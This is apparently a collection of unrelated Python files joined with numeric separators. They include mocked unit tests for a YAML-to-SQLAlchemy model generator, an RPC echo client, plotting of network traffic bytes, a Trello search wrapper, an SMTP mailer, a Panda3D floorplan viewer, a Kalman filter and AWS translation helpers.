@mock.patch('modelgen.modelgenerator.Parser')
@mock.patch('modelgen.modelgenerator.Template')
def test_create_alembic_meta(self, mock_templt, mock_prsr, mock_pth,
mock_wrtf, mock_init, mock_validate):
'''
Test _create_alembic_meta function. Function creates
alembic support by a folder called metadata and
a file __init__.py in the folder. This file contains
sqlalchemy metadata imported from all the sqlalchemy
model files
'''
mock_init.return_value = None
mock_validate.validate.return_value = True
mock_wrtf.return_value = True
mock_prsr.data.return_value = self.yaml
model_obj = ModelGenerator()
response = model_obj._create_alembic_meta()
self.assertEqual(True, response)
mock_wrtf.assert_called_with(path=path.join(getcwd(), 'metadata/__init__.py'),
data=mock_templt().render())
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.Path')
@mock.patch('modelgen.modelgenerator.copyfile')
def test_create_template_folder(self, mock_cpyfile, mock_pth, mock_ospth):
'''
Test _create_template_folder function. Function creates
templates folder structure when modelgen is initialized
'''
mock_ospth.join.side_effects = ['./test', './test', './test', './test']
mock_ospth.exists.return_value = False
mock_pth.mkdir.return_value = True
mock_cpyfile.return_value = True
model_obj = ModelGenerator()
response = model_obj._create_template_folder(init='./testfolder')
self.assertEqual(response, True)
mock_cpyfile.assert_called_with(mock_ospth.join(), mock_ospth.join())
@mock.patch('modelgen.ModelGenerator._create_alembic_folder')
@mock.patch('modelgen.modelgenerator.Path')
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.copyfile')
def test_create_template_folder_exists(self, mock_cpyfile, mock_ospth, mock_pth, mock_caf):
'''
Test _create_template_folder function when folder already exists
Function throws FileExistsError.
'''
mock_pth.mkdir.return_value = FileExistsError
mock_caf.return_value = True
mock_ospth.join.side_effects = ['./test', './test', './test', './test']
mock_ospth.exists.return_value = True
mock_cpyfile.return_value = True
model_obj = ModelGenerator()
with self.assertRaises(FileExistsError) as err:
model_obj._create_template_folder(init='./models')
@mock.patch('modelgen.modelgenerator.copytree')
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.Path')
@mock.patch('modelgen.modelgenerator.copyfile')
def test_create_alembic_folder(self, mock_cpyfile, mock_pth, mock_ospth,
mock_cptr):
'''
Test _create_alembic_folder function. Tests the
creation of folders alembic/versions, alembic/alembic.ini,
alembic/env.py. Relative path is passed in this
test
'''
mock_cptr.return_value = True
mock_ospth.join.return_value = './testfolder'
mock_ospth.isabs.return_value = False
mock_ospth.exists.return_value = False
mock_pth.mkdir.return_value = True
mock_cpyfile.return_value = True
model_obj = ModelGenerator()
response = model_obj._create_alembic_folder(init='./testfolder')
self.assertEqual(response, True)
mock_cptr.assert_called_with(mock_ospth.join(), mock_ospth.join())
@mock.patch('modelgen.modelgenerator.copytree')
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.Path')
@mock.patch('modelgen.modelgenerator.copyfile')
def test_create_alembic_folder_absolute_path(self, mock_cpyfile, mock_pth, mock_ospth,
mock_cptr):
'''
Test _create_alembic_folder function. Tests the
creation of folders alembic/versions, alembic/alembic.ini,
alembic/env.py. Absolute path is passed in this
test.
'''
mock_cptr.return_value = True
mock_ospth.join.return_value = '/testfolder'
mock_ospth.exists.return_value = False
mock_pth.mkdir.return_value = True
mock_cpyfile.return_value = True
model_obj = ModelGenerator()
response = model_obj._create_alembic_folder(init='/testfolder')
self.assertEqual(response, True)
mock_cptr.assert_called_with(mock_ospth.join(), mock_ospth.join())
@mock.patch('modelgen.ModelGenerator._create_template_folder')
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.copytree')
@mock.patch('modelgen.modelgenerator.copyfile')
def test_create_alembic_folder_exists(self, mock_cpyfile, mock_cptr, mock_ospth, mock_ctf):
'''
Test _create_alembic_folder function when folder
already exists. The function raises FileExistsError
'''
mock_ctf.return_value = True
mock_cptr.return_value = True
mock_ospth.join.side_effects = ['./test', './test', './test', './test']
mock_ospth.exists.return_value = True
mock_cpyfile.return_value = True
model_obj = ModelGenerator()
with self.assertRaises(FileExistsError) as err:
model_obj._create_alembic_folder(init='./docs')
@mock.patch('modelgen.modelgenerator.ModelGenerator._create_alembic_folder')
@mock.patch('modelgen.modelgenerator.ModelGenerator._create_template_folder')
@mock.patch('modelgen.modelgenerator.ModelGenerator._create_checkpoint_file')
def test_modelgenerator_init(self, mock_cafldr, mock_ctfldr, mock_cchk):
obj = ModelGenerator(init='./test')
mock_cafldr.assert_called_with(init='./test')
mock_cchk.assert_called_with(init='./test')
mock_ctfldr.assert_called_with(init='./test')
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.ModelGenerator._create_model')
@mock.patch('modelgen.modelgenerator.ModelGenerator._find_checkpoint_file')
def test_modelgenerator_init_create_model_elif_w_yaml_extn(self, mock_fcf,
mock_cm, mock_ospth):
'''
Test modelgen/modelgenerator.py file's __init__ method
when schema yaml file with extension .yaml is passed
'''
mock_ospth.return_value = True
mock_cm.return_value = True
        mock_fcf.return_value = True
obj = ModelGenerator(createmodel=True, file='./test.yaml')
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.ModelGenerator._create_model')
@mock.patch('modelgen.modelgenerator.ModelGenerator._find_checkpoint_file')
def test_modelgenerator_init_create_model_elif_w_yml_extn(self, mock_fcf,
mock_cm, mock_ospth):
'''
Test modelgen/modelgenerator.py file's __init__ method
when schema yaml file with extension .yml is passed
'''
mock_ospth.return_value = True
mock_cm.return_value = True
        mock_fcf.return_value = True
obj = ModelGenerator(createmodel=True, file='./test.yml')
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.ModelGenerator._create_model')
@mock.patch('modelgen.modelgenerator.ModelGenerator._find_checkpoint_file')
def test_modelgenerator_init_create_model_elif_wo_yaml_extn(self, mock_fcf, mock_cm, mock_ospth):
'''
Test modelgen/modelgenerator.py file's __init__ method
when schema file without .yaml or .yml is passed. The
function will throw NameError
'''
mock_ospth.return_value = True
mock_cm.return_value = True
        mock_fcf.return_value = True
with self.assertRaises(NameError) as err:
obj = ModelGenerator(createmodel=True, file='./test.txt')
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.ModelGenerator._create_model')
@mock.patch('modelgen.modelgenerator.ModelGenerator._find_checkpoint_file')
def test_modelgenerator_createmodel_find_checkpoint_file_true(self, mock_fcf,
mock_cm, mock_ospth):
'''
Test _find_checkpoint_file_ when the checkpoint file,
.modelgen, exists.
'''
mock_ospth.return_value = True
mock_cm.return_value = True
        mock_fcf.return_value = True
obj = ModelGenerator(createmodel=True, file='./test.yaml')
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.ModelGenerator._create_model')
@mock.patch('modelgen.modelgenerator.ModelGenerator._find_checkpoint_file')
def test_modelgenerator_createmodel_find_checkpoint_file_false(self, mock_fcf,
mock_cm, mock_ospth):
'''
Test _find_checkpoint_file_ when the checkpoint file,
.modelgen, doesn't exists.
'''
mock_ospth.return_value = True
mock_cm.return_value = True
mock_fcf.return_value = False
obj = ModelGenerator(createmodel=True, file='./test.yaml')
mock_fcf.assert_called_with()
@mock.patch('modelgen.modelgenerator.Helper.write_to_file')
def test_create_checkpoint_file(self, mock_wrtf):
'''
Test _create_checkpoint_file. The checkpoint file
is created when the modelgen is initialized for the
first time
'''
mock_wrtf.return_value = True
obj = ModelGenerator()
obj._create_checkpoint_file(init='./dummy')
mock_wrtf.assert_called_with(path='./dummy/.modelgen', data='')
@mock.patch('modelgen.modelgenerator.path')
def test_find_checkpoint_file_exists(self, mock_ospth):
mock_ospth.exists.return_value = True
obj = ModelGenerator()
response = obj._find_checkpoint_file()
self.assertEqual(response, True)
mock_ospth.exists.assert_called_with(mock_ospth.join())
@mock.patch('modelgen.modelgenerator.path')
def test_find_checkpoint_file_not_found(self, mock_ospth):
mock_ospth.exists.return_value = False
obj = ModelGenerator()
with self.assertRaises(FileNotFoundError) as err:
obj._find_checkpoint_file()
@classmethod
def tearDownClass(self):
pass
|
15790
|
from twisted.internet import defer, reactor
@defer.inlineCallbacks
def main():
try:
from txmsgpackrpc.client import connect
c = yield connect('localhost', 8000, ssl=True, connectTimeout=5, waitTimeout=5)
data = {
'firstName': 'John',
'lastName': 'Smith',
'isAlive': True,
'age': 25,
'height_cm': 167.6,
'address': {
'streetAddress': "21 2nd Street",
"city": 'New York',
"state": 'NY',
'postalCode': '10021-3100'
},
'phoneNumbers': [
{
'type': 'home',
'number': '212 555-1234'
},
{
'type': 'office',
'number': '646 555-4567'
}
],
'children': [],
'spouse': None
}
res = yield c.createRequest('echo', data)
assert data == res
print res
except Exception:
import traceback
traceback.print_exc()
finally:
reactor.stop()
if __name__ == '__main__':
reactor.callWhenRunning(main)
reactor.run()
|
15797
|
from math import erf, sqrt
from functools import partial
from ..library.multinomial import multinomial, to_multinomial
def gaussian_cdf(x, mu, sigma):
    y = (1.0 + erf((x - mu) / (sigma * sqrt(2.0)))) / 2.0
assert y >= 0 and y <= 1.0, 'y is not a valid probability: y={}'.format(y)
return y
def gaussian_cdfp(mu, sigma):
return partial(gaussian_cdf, mu=mu, sigma=sigma)
def gaussian(mu, sigma, block, kernel=None):
'''
Construct to create a discrete approximation of the gaussian distribution using mu and sigma
(gaussian 0 1 blocka)
'''
return multinomial(*multinomial(-3, 3, 64, gaussian_cdfp(float(mu), float(sigma))), offset=block, definitions=kernel.definitions)
|
15850
|
import pandas as pd
import numpy as np
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
import utils
import glob, os
import pca.dataanalyzer as da, pca.pca as pca
from sklearn.metrics import accuracy_score
# visulaize the important characteristics of the dataset
import matplotlib.pyplot as plt
seed = 0
num_headers = 16
data_len = 54*num_headers #1460
dirs = ["C:/Users/salik/Documents/Data/LinuxChrome/{}/".format(num_headers),
"C:/Users/salik/Documents/Data/WindowsFirefox/{}/".format(num_headers),
"C:/Users/salik/Documents/Data/WindowsChrome/{}/".format(num_headers),
"C:/Users/salik/Documents/Data/WindowsSalik/{}/".format(num_headers),
"C:/Users/salik/Documents/Data/WindowsAndreas/{}/".format(num_headers)]
# dirs = ["E:/Data/h5/https/", "E:/Data/h5/netflix/"]
# step 1: get the data
dataframes = []
num_examples = 0
for dir in dirs:
for fullname in glob.iglob(dir + '*.h5'):
filename = os.path.basename(fullname)
df = utils.load_h5(dir, filename)
dataframes.append(df)
num_examples = len(df.values)
# create one large dataframe
data = pd.concat(dataframes)
data = data.sample(frac=1, random_state=seed).reset_index(drop=True)
num_rows = data.shape[0]
columns = data.columns
print(columns)
# step 2: get features (x) and convert it to numpy array
x = da.getbytes(data, data_len)
# step 3: get class labels y and then encode it into number
# get class label data
y = data['label'].values
# encode the class label
class_labels = np.unique(y)
label_encoder = LabelEncoder()
y = label_encoder.fit_transform(y)
# step 4: split the data into training set and test set
test_percentage = 0.5
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=test_percentage, random_state=seed)
plot_savename = "histogram_payload"
from matplotlib import rcParams
# Make room for xlabel which is otherwise cut off
rcParams.update({'figure.autolayout': True})
# scatter plot the sample points among 5 classes
# markers = ('s', 'd', 'o', '^', 'v', ".", ",", "<", ">", "8", "p", "P", "*", "h", "H", "+", "x", "X", "D", "|", "_")
color_map = {0: '#487fff', 1: '#d342ff', 2: '#4eff4e', 3: '#2ee3ff', 4: '#ffca43', 5:'#ff365e', 6:'#626663'}
plt.figure()
for idx, cl in enumerate(np.unique(y_test)):
# Get count of unique values
values, counts = np.unique(x_test[y_test == cl], return_counts=True)
# Maybe remove zero as there is a lot of zeros in the header
# values = values[1:]
# counts = counts[1:]
n, bins, patches = plt.hist(values, weights=counts, bins=256, facecolor=color_map[idx], label=class_labels[cl], alpha=0.8)
plt.legend(loc='upper right')
plt.title('Histogram of : {}'.format(class_labels))
plt.tight_layout()
# plt.savefig('{0}{1}.png'.format(plot_savename, int(perplexity)), dpi=300)
plt.show()
|
15852
|
import time
import uuid
from random import random
def now():
return int(time.time() * 1000)
def uuid1():
return str(uuid.uuid1())
def millis(s):
return s * 1000
def seconds(ms):
return ms / 1000
def exponential_backoff(
attempts,
base_delay,
max_delay=None,
jitter=True,
):
"""
Get the next delay for retries in exponential backoff.
attempts: Number of attempts so far
base_delay: Base delay, in seconds
max_delay: Max delay, in seconds. If None (default), there is no max.
jitter: If True, add a random jitter to the delay
"""
if max_delay is None:
max_delay = float("inf")
backoff = min(max_delay, base_delay * 2 ** max(attempts - 1, 0))
if jitter:
backoff = backoff * random()
return backoff
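# Minimal usage sketch (illustrative only; the retry loop below is an
# assumption, not part of this module's API):
if __name__ == "__main__":
    for attempt in range(1, 6):
        delay = exponential_backoff(attempt, base_delay=0.5, max_delay=10)
        print("attempt {}: would sleep {:.3f}s before retrying".format(attempt, delay))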
|
15873
|
import json
import requests
class Searchs(object):
__module__ = 'trello'
def __init__(self, apikey, token=None):
self._apikey = apikey
self._token = token
def get(self, query, idOrganizations, idBoards=None, idCards=None, modelTypes=None, board_fields=None, boards_limit=None, card_fields=None, cards_limit=None, card_board=None, card_list=None, card_members=None, organization_fields=None, organizations_limit=None, member_fields=None, members_limit=None, action_fields=None, actions_limit=None, actions_since=None, partial=None):
resp = requests.get("https://trello.com/1/search" % (), params=dict(key=self._apikey, token=self._token, query=query, idOrganizations=idOrganizations, idBoards=idBoards, idCards=idCards, modelTypes=modelTypes, board_fields=board_fields, boards_limit=boards_limit, card_fields=card_fields, cards_limit=cards_limit, card_board=card_board, card_list=card_list, card_members=card_members, organization_fields=organization_fields, organizations_limit=organizations_limit, member_fields=member_fields, members_limit=members_limit, action_fields=action_fields, actions_limit=actions_limit, actions_since=actions_since, partial=partial), data=None)
resp.raise_for_status()
return resp.json()
|
15908
|
r"""
This is the base module for all other objects of the package.
+ `LaTeX` returns a LaTeX string out of an `Irene` object.
+ `base` is the parent of all `Irene` objects.
"""
def LaTeX(obj):
r"""
Returns LaTeX representation of Irene's objects.
"""
from sympy.core.core import all_classes
from Irene import SDPRelaxations, SDRelaxSol, Mom
inst = isinstance(obj, SDPRelaxations) or isinstance(
obj, SDRelaxSol) or isinstance(obj, Mom)
if inst:
return obj.__latex__()
elif isinstance(obj, tuple(all_classes)):
from sympy import latex
return latex(obj)
class base(object):
r"""
    All the modules in `Irene` extend this class, which performs some common
    tasks such as checking the existence of certain software.
"""
def __init__(self):
from sys import platform
self.os = platform
if self.os == 'win32':
import os
BASE = os.sep.join(os.path.dirname(os.path.realpath(__file__)).split(os.sep)) + os.sep
self.Path = dict(csdp=BASE+"csdp.exe", sdpa=BASE+"sdpa.exe")
else:
self.Path = dict(csdp="csdp", sdpa="sdpa")
def which(self, program):
r"""
Check the availability of the `program` system-wide.
Returns the path of the program if exists and returns
'None' otherwise.
"""
import os
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
def AvailableSDPSolvers(self):
r"""
find the existing sdp solvers.
"""
existsing = []
# CVXOPT
try:
import cvxopt
existsing.append('CVXOPT')
except ImportError:
pass
if self.os == 'win32':
from os.path import isfile
# DSDP
if ('dsdp' in self.Path):
if isfile(self.Path['dsdp']):
existsing.append('DSDP')
# SDPA
if ('sdpa' in self.Path):
if isfile(self.Path['sdpa']):
existsing.append('SDPA')
if ('csdp' in self.Path):
if isfile(self.Path['csdp']):
existsing.append('CSDP')
else:
# DSDP
if self.which('dsdp5') is not None:
existsing.append('DSDP')
# SDPA
if self.which('sdpa') is not None:
existsing.append('SDPA')
# CSDP
if self.which('csdp') is not None:
existsing.append('CSDP')
return existsing
|
15917
|
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.header import Header
from email.mime.base import MIMEBase
from email import encoders
import os
import uuid
import smtplib
import re
class CTEmail(object):
def __init__(self, usr, pwd, server='smtp.qq.com', port=25, hide=True):
self.user = usr
        self.password = pwd
self.server = server
self.port = port
self.hide = hide
self.pattern_img = r'(<EMAIL_IMG>.+</EMAIL_IMG>)'
def attach_image(self, img_dict):
"""
Attach image to use it in HTML mail body
:param img_dict:
:return: MIMEImage attachment
"""
with open(img_dict['path'], 'rb') as file:
msg_image = MIMEImage(file.read(), name=os.path.basename(img_dict['path']))
msg_image.add_header('Content-ID', '<{}>'.format(img_dict['cid']))
return msg_image
def attach_file(self, filename):
"""
Attach file to mail letter
:param filename: str
:return: MIMEBase attachment
"""
part = MIMEBase('application', 'octet-stream')
data = open(filename, 'rb').read()
part.set_payload(data)
encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename=%s' % os.path.basename(filename))
return part
def prepare_email(self, subject, recipients, content, images):
"""
Prepare mail body with attachments.
Basically this function form message.
:param subject: str
:param recipients: list
:param content: str
:param images: list
:return: message object
"""
msg = MIMEMultipart('related')
msg['Subject'] = Header(subject, 'utf-8')
msg['From'] = self.user
if self.hide:
msg['bcc'] = 'undisclosed-recipients'
else:
msg['to'] = ','.join(recipients)
msg_alternative = MIMEMultipart('alternative')
img_list = []
if images:
index = 0
for image in images:
image = dict(title='Image {0}'.format(index), path=image, cid=str(uuid.uuid4()))
img_html = '<div dir="ltr"><img src="cid:{cid}" ' \
'alt="Image should appear here...but this did not happened (" ' \
'style="display: block; color: #666666; ' \
'font-family: Helvetica, arial, sans-serif; font-size: 16px;" ' \
'class="img-max"></div>'.format(cid=image['cid'])
content = re.sub(self.pattern_img, img_html, content, 1)
img_list.append(image)
index += 1
msg_html = MIMEText(content, 'html', 'utf-8')
msg_alternative.attach(msg_html)
msg.attach(msg_alternative)
# the sequence of images attachment matters, so need twice check
if img_list:
for img in img_list:
msg.attach(self.attach_image(img))
return msg
def send_email(self, subject, content_path, recipients):
"""
This function send email to the list of recipients.
Images are automatically added if content_path is directory
(assumed that this directory contains html+images)
:param subject: str
:param content_path: str
:param recipients: list
:return: None
"""
        if os.path.exists(content_path):
            # make sure both variables exist even when content_path is a single HTML file
            content = ''
            images = []
            if os.path.isdir(content_path):
                files = sorted(os.listdir(content_path))
for file in files:
path = os.path.join(content_path, file)
if file.endswith('.html'):
content = open(path, 'r').read()
elif file.endswith('.jpg') or file.endswith('.jpeg') or file.endswith('.png'):
images.append(path)
elif os.path.isfile(content_path):
content = open(content_path, 'r', encoding='utf-8').read()
msg = self.prepare_email(subject, recipients, content, images)
mailServer = smtplib.SMTP(self.server, self.port)
mailServer.ehlo()
mailServer.starttls()
mailServer.ehlo()
mailServer.login(self.user, self.password)
mailServer.sendmail(self.user, recipients, msg.as_string())
mailServer.quit()
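# Example usage sketch (illustrative; addresses, credentials and paths below are
# placeholders, not real values):
#   mailer = CTEmail('user@example.com', 'app-password', server='smtp.qq.com', port=587)
#   mailer.send_email('Weekly report', './report_dir', ['someone@example.com'])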
|
15932
|
from math import pi, sin, cos
from panda3d.core import *
from direct.showbase.ShowBase import ShowBase
from direct.task import Task
from floorplan import Floorplan
import numpy as np
import random
import copy
class Viewer(ShowBase):
def __init__(self):
ShowBase.__init__(self)
#self.scene = self.loader.loadModel("floorplan_1.txt-floor.obj")
#self.scene = base.loader.loadModel("floorplan_1.txt-floor.egg")
#self.scene = base.loader.loadModel("panda.egg")
#self.scene = base.loader.loadModel("environment")
base.setBackgroundColor(0, 0, 0)
self.angle = 0.0
lens = PerspectiveLens()
lens.setFov(60)
lens.setNear(0.01)
lens.setFar(100000)
base.cam.node().setLens(lens)
floorplan = Floorplan('test/floorplan_7')
#floorplan.setFilename('test/floorplan_2')
floorplan.read()
self.scene = floorplan.generateEggModel()
self.scene.reparentTo(self.render)
#self.scene.setScale(0.01, 0.01, 0.01)
#self.scene.setTwoSided(True)
self.scene.setTwoSided(True)
#self.scene.setPos(0, 0, 3)
#texture = loader.loadTexture("floorplan_1.png")
#self.scene.setTexture(texture)
#self.scene.setHpr(0, 0, 0)
# angleDegrees = 0
# angleRadians = angleDegrees * (pi / 180.0)
# self.camera.setPos(20 * sin(angleRadians), -20 * cos(angleRadians), 3)
# self.camera.setHpr(angleDegrees, 0, 0)
#self.camera.lookAt(0, 0, 0)
self.alight = AmbientLight('alight')
self.alight.setColor(VBase4(0.2, 0.2, 0.2, 1))
self.alnp = self.render.attachNewNode(self.alight)
self.render.setLight(self.alnp)
dlight = DirectionalLight('dlight')
dlight.setColor(VBase4(1, 1, 1, 1))
dlnp = self.render.attachNewNode(dlight)
#dlnp.setHpr(0, -90, 0)
dlnp.setPos(0.5, 0.5, 3)
dlnp.lookAt(0.5, 0.5, 2)
self.render.setLight(dlnp)
for i in xrange(10):
plight = PointLight('plight')
plight.setAttenuation((1, 0, 1))
color = random.randint(10, 15)
plight.setColor(VBase4(color, color, color, 1))
plnp = self.render.attachNewNode(plight)
if i == 0:
plnp.setPos(0.5, 0.5, 3)
else:
plnp.setPos(1 * random.random(), 1 * random.random(), 0.3)
pass
self.render.setLight(plnp)
#base.useTrackball()
#base.trackball.node().setPos(2.0, 0, 3)
#base.trackball.node().setHpr(0, 0, 3)
#base.enableMouse()
#base.useDrive()
base.disableMouse()
self.taskMgr.add(self.spinCameraTask, "SpinCameraTask")
#self.accept('arrow_up', self.moveForward)
#self.accept('arrow_up_-repeat', self.moveForward)
self.topDownCameraPos = [0.5, 0.5, 1.5]
self.topDownTarget = [0.5, 0.499, 0.5]
self.topDownH = 0
self.startCameraPos = floorplan.startCameraPos
self.startTarget = floorplan.startTarget
self.startH = 0
self.cameraPos = self.topDownCameraPos
self.target = self.topDownTarget
self.H = self.topDownH
self.accept('space', self.openDoor)
self.accept('enter', self.startChangingView)
self.viewMode = 'T'
self.viewChangingProgress = 1.02
ceiling = self.scene.find("**/ceiling")
ceiling.hide()
return
def moveForward(self):
self.cameraPos[0] -= 0.1
def openDoor(self):
minDistance = 10000
doors = self.scene.find("**/doors")
for door in doors.getChildren():
mins, maxs = door.getTightBounds()
vec_1 = (mins + maxs) / 2 - Vec3(self.target[0], self.target[1], (mins[2] + maxs[2]) / 2)
vec_2 = (mins + maxs) / 2 - Vec3(self.cameraPos[0], self.cameraPos[1], (mins[2] + maxs[2]) / 2)
if (vec_1.dot(vec_2) > 0 and vec_1.length() > vec_2.length()) or np.arccos(abs(vec_1.dot(vec_2)) / (vec_1.length() * vec_2.length())) > np.pi / 4:
continue
distance = pow(pow(self.cameraPos[0] - (mins[0] + maxs[0]) / 2, 2) + pow(self.cameraPos[1] - (mins[1] + maxs[1]) / 2, 2) + pow(self.cameraPos[2] - (mins[2] + maxs[2]) / 2, 2), 0.5)
if distance < minDistance:
minDistanceDoor = door
minDistance = distance
pass
continue
if minDistance > 1:
return
mins, maxs = minDistanceDoor.getTightBounds()
if abs(maxs[0] - mins[0]) > abs(maxs[1] - mins[1]):
minsExpected = Vec3(mins[0] - (maxs[1] - mins[1]), mins[1], mins[2])
maxsExpected = Vec3(mins[0], mins[1] + (maxs[0] - mins[0]), maxs[2])
else:
minsExpected = Vec3(mins[0] - (maxs[1] - mins[1]) + (maxs[0] - mins[0]), mins[1] - (maxs[0] - mins[0]), mins[2])
maxsExpected = Vec3(mins[0] + (maxs[0] - mins[0]), mins[1] + (maxs[0] - mins[0]) - (maxs[0] - mins[0]), maxs[2])
pass
minDistanceDoor.setH(minDistanceDoor, 90)
mins, maxs = minDistanceDoor.getTightBounds()
minDistanceDoor.setPos(minDistanceDoor, minsExpected[1] - mins[1], -minsExpected[0] + mins[0], 0)
#print(scene.findAllMatches('doors'))
return
def startChangingView(self):
self.viewChangingProgress = 0
self.prevCameraPos = copy.deepcopy(self.cameraPos)
self.prevTarget = copy.deepcopy(self.target)
self.prevH = self.camera.getR()
if self.viewMode == 'T':
self.newCameraPos = self.startCameraPos
self.newTarget = self.startTarget
self.newH = self.startH
self.viewMode = 'C'
else:
self.newCameraPos = self.topDownCameraPos
self.newTarget = self.topDownTarget
self.newH = self.topDownH
self.startCameraPos = copy.deepcopy(self.cameraPos)
self.startTarget = copy.deepcopy(self.target)
self.startH = self.camera.getR()
self.viewMode = 'T'
pass
return
def changeView(self):
self.cameraPos = []
self.target = []
for c in xrange(3):
self.cameraPos.append(self.prevCameraPos[c] + (self.newCameraPos[c] - self.prevCameraPos[c]) * self.viewChangingProgress)
self.target.append(self.prevTarget[c] + (self.newTarget[c] - self.prevTarget[c]) * self.viewChangingProgress)
continue
self.H = self.prevH + (self.newH - self.prevH) * self.viewChangingProgress
if self.viewChangingProgress + 0.02 >= 1 and self.viewMode == 'C':
ceiling = self.scene.find("**/ceiling")
ceiling.show()
pass
if self.viewChangingProgress <= 0.02 and self.viewMode == 'T':
ceiling = self.scene.find("**/ceiling")
ceiling.hide()
pass
return
def spinCameraTask(self, task):
#print(task.time)
#angleDegrees = task.time * 6.0
movementStep = 0.003
if self.viewChangingProgress <= 1.01:
self.changeView()
self.viewChangingProgress += 0.02
pass
if base.mouseWatcherNode.is_button_down('w'):
for c in xrange(2):
step = movementStep * (self.target[c] - self.cameraPos[c])
self.cameraPos[c] += step
self.target[c] += step
continue
pass
if base.mouseWatcherNode.is_button_down('s'):
for c in xrange(2):
step = movementStep * (self.target[c] - self.cameraPos[c])
self.cameraPos[c] -= step
self.target[c] -= step
continue
pass
if base.mouseWatcherNode.is_button_down('a'):
step = movementStep * (self.target[0] - self.cameraPos[0])
self.cameraPos[1] += step
self.target[1] += step
step = movementStep * (self.target[1] - self.cameraPos[1])
self.cameraPos[0] -= step
self.target[0] -= step
pass
if base.mouseWatcherNode.is_button_down('d'):
step = movementStep * (self.target[0] - self.cameraPos[0])
self.cameraPos[1] -= step
self.target[1] -= step
step = movementStep * (self.target[1] - self.cameraPos[1])
self.cameraPos[0] += step
self.target[0] += step
pass
rotationStep = 0.02
if base.mouseWatcherNode.is_button_down('arrow_left'):
angle = np.angle(complex(self.target[0] - self.cameraPos[0], self.target[1] - self.cameraPos[1]))
angle += rotationStep
self.target[0] = self.cameraPos[0] + np.cos(angle)
self.target[1] = self.cameraPos[1] + np.sin(angle)
pass
if base.mouseWatcherNode.is_button_down('arrow_right'):
angle = np.angle(complex(self.target[0] - self.cameraPos[0], self.target[1] - self.cameraPos[1]))
angle -= rotationStep
self.target[0] = self.cameraPos[0] + np.cos(angle)
self.target[1] = self.cameraPos[1] + np.sin(angle)
pass
if base.mouseWatcherNode.is_button_down('arrow_up'):
angle = np.arcsin(self.target[2] - self.cameraPos[2])
angle += rotationStep
self.target[2] = self.cameraPos[2] + np.sin(angle)
pass
if base.mouseWatcherNode.is_button_down('arrow_down'):
angle = np.arcsin(self.target[2] - self.cameraPos[2])
angle -= rotationStep
self.target[2] = self.cameraPos[2] + np.sin(angle)
pass
angleDegrees = self.angle
angleRadians = angleDegrees * (pi / 180.0)
#self.camera.setPos(2.0 * sin(angleRadians), -2.0 * cos(angleRadians), 3)
self.camera.setPos(self.cameraPos[0], self.cameraPos[1], self.cameraPos[2])
#self.camera.setHpr(angleDegrees, 0, 0)
#self.camera.lookAt(0, 0, 0)
self.camera.lookAt(self.target[0], self.target[1], self.target[2])
self.camera.setR(self.H)
#if base.mouseWatcherNode.hasMouse()
return Task.cont
app = Viewer()
app.run()
|
15934
|
import numpy as np
class KF1D:
    # This Kalman filter assumes a constant covariance matrix, so the calculations are much simpler.
    # The Kalman gain K also needs to be precomputed using the control module (see below).
def __init__(self, x0, A, C, K):
self.x = x0
self.A = A
self.C = C
self.K = K
self.A_K = self.A - np.dot(self.K, self.C)
        # The K matrix needs to be pre-computed as follows:
# import control
# (x, l, K) = control.dare(np.transpose(self.A), np.transpose(self.C), Q, R)
# self.K = np.transpose(K)
def update(self, meas):
self.x = np.dot(self.A_K, self.x) + np.dot(self.K, meas)
return self.x
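
# Usage sketch (illustrative, not part of the original module): a 1-D position/velocity
# filter with hand-picked matrices. The gain K would normally come from control.dare as
# described above; the values below are placeholders chosen only for demonstration.
if __name__ == "__main__":
    dt = 0.05
    x0 = np.array([[0.0], [0.0]])           # initial [position, velocity]
    A = np.array([[1.0, dt], [0.0, 1.0]])   # constant-velocity state transition
    C = np.array([[1.0, 0.0]])              # only position is measured
    K = np.array([[0.5], [0.1]])            # placeholder steady-state Kalman gain
    kf = KF1D(x0, A, C, K)
    for z in [1.0, 1.1, 1.3, 1.4]:
        state = kf.update([[z]])            # returns the updated state estimate
    print(state)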
|
15987
|
import boto3
comprehend = boto3.client(service_name='comprehend')
translate = boto3.client(service_name='translate')
def detect_language(text):
"""
Detects the dominant language in a text
Parameters
----------
text: string, required
Input text
Returns
-------
string
Representing language code of the dominant language
"""
# Sending call to get language
result = comprehend.detect_dominant_language(Text = text)['Languages']
# Since the result can contain more than one language find the one with the highest score.
high_score = 0
best_guess = ''
for lang in range(len(result)):
if result[lang]['Score'] > high_score:
high_score = result[lang]['Score']
best_guess = result[lang]['LanguageCode']
return best_guess
def translate_text(text, source_lang, destination_lang):
"""
Translates given text from source language into destination language
Parameters
----------
text: string, required
Input text in source language
Returns
-------
string
Translated text in destination language
"""
result = translate.translate_text(Text=text,
SourceLanguageCode=source_lang, TargetLanguageCode=destination_lang)
return result.get('TranslatedText')
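
# Usage sketch (illustrative; calling these helpers requires valid AWS credentials,
# a configured region, and permissions for Comprehend and Translate; the sample text
# and target language below are arbitrary):
if __name__ == "__main__":
    sample = "Bonjour tout le monde"
    source_lang = detect_language(sample)
    print(translate_text(sample, source_lang, "en"))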
|
16009
|
import os
import pytest
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')
